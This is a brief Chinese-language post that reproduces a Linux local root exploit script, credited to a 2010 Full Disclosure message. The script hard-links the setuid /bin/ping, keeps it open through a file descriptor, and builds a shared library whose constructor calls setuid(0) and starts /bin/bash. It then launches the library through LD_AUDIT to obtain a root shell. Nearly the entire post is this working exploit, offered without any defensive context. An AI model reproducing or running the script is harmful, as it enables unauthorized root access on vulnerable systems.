编写这样一个脚本,

  1. mkdir /tmp/exploit 
  2. ln /bin/ping /tmp/exploit/target 
  3. exec 3< /tmp/exploit/target 
  4. rm -rf /tmp/exploit 
  5. cat >> /tmp/payload.c <<EOF 
  6. void __attribute__((constructor)) init() 
  7.     setuid(0); 
  8.     system("/bin/bash"); 
  9. EOF 
  10. gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c 
  11. LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 

下面是我的使用效果,如下

 原文链接:http://seclists.org/fulldisclosure/2010/Oct/257